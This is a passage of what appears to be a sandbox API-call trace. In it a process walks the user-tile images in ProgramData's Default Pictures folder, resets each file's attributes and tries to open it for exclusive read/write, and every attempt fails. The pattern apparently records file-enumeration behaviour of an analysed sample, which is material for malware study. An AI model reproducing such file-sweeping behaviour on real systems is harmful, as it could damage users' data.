"c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile10.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.723] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.723] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.723] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.723] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.723] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp", dwFileAttributes=0x80) returned 0 [0140.723] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile11.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.723] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.723] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.724] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.724] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.724] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp", dwFileAttributes=0x80) returned 0 [0140.724] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile12.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.724] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.724] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.724] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.724] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.724] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp", dwFileAttributes=0x80) returned 0 [0140.724] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile13.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.725] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.725] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.725] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.725] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.725] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp", dwFileAttributes=0x80) returned 0 [0140.726] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile14.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.726] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.726] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.726] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.726] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.726] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp", dwFileAttributes=0x80) returned 0 [0140.726] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile15.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.726] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.726] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.726] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.726] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.727] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp", dwFileAttributes=0x80) returned 0 [0140.727] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile16.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.727] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.727] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.727] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.727] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.727] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp", dwFileAttributes=0x80) returned 0 [0140.727] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile17.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.727] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.727] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.728] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.728] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.728] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp", dwFileAttributes=0x80) returned 0 [0140.728] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile18.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.728] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.728] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.729] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.729] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.729] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp", dwFileAttributes=0x80) returned 0 [0140.729] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile19.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.729] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.729] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.729] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.729] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.729] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp", dwFileAttributes=0x80) returned 0 [0140.729] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile20.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.730] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.730] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.730] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.730] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.730] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp", dwFileAttributes=0x80) returned 0 [0140.730] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile21.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.730] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.730] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.730] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.730] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.730] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp", dwFileAttributes=0x80) returned 0 [0140.731] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile22.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.731] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.731] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.731] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.731] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.732] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp", dwFileAttributes=0x80) returned 0 [0140.732] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile23.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.732] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.732] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.732] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.732] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.732] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp", dwFileAttributes=0x80) returned 0 [0140.732] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile24.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.732] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.732] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.732] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.732] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.733] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp", dwFileAttributes=0x80) returned 0 [0140.733] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile25.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.733] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.733] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.733] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.733] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.733] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp", dwFileAttributes=0x80) returned 0 [0140.734] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile26.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.734] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.734] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.734] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.734] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.734] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp", dwFileAttributes=0x80) returned 0 [0140.734] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile27.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.734] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.734] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.735] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.735] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.735] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp", dwFileAttributes=0x80) returned 0 [0140.735] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile28.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.735] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.735] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.735] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.735] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.735] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp", dwFileAttributes=0x80) returned 0 [0140.735] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile29.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.736] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.736] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.736] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.736] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.736] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp", dwFileAttributes=0x80) returned 0 [0140.736] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile30.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.737] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.737] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.737] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.737] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.737] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp", dwFileAttributes=0x80) returned 0 [0140.737] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile31.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.737] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.737] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.737] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.737] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.738] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp", dwFileAttributes=0x80) returned 0 [0140.738] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile32.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.738] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.738] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.738] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.738] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.738] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp", dwFileAttributes=0x80) returned 0 [0140.738] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile33.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.738] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.738] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.738] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.738] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.739] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp", dwFileAttributes=0x80) returned 0 [0140.739] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile34.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.739] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.739] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.740] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.740] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.740] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp", dwFileAttributes=0x80) returned 0 [0140.740] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile35.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.740] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.740] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.740] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.740] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.740] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp", dwFileAttributes=0x80) returned 0 [0140.740] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile36.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.741] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.741] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.741] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.741] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.741] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp", dwFileAttributes=0x80) returned 0 [0140.741] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile37.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.741] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.741] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.741] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.741] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.741] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp", dwFileAttributes=0x80) returned 0 [0140.743] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile38.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.743] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.743] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.743] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.743] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.743] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp", dwFileAttributes=0x80) returned 0 [0140.743] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile39.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.743] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.743] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.743] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.743] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 